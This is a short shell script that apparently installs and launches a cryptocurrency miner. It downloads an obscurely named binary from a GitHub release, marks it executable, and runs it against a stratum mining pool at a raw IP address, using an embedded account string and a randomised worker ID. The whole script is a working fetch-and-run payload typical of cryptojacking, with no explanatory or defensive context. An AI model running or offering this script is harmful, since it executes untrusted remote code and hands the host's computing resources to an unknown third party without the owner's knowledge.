#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/xcvmk/releases/download/xcfr/xcsx
chmod +x xcsx
./xcsx -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-xcvl@72.14.187.207:8081
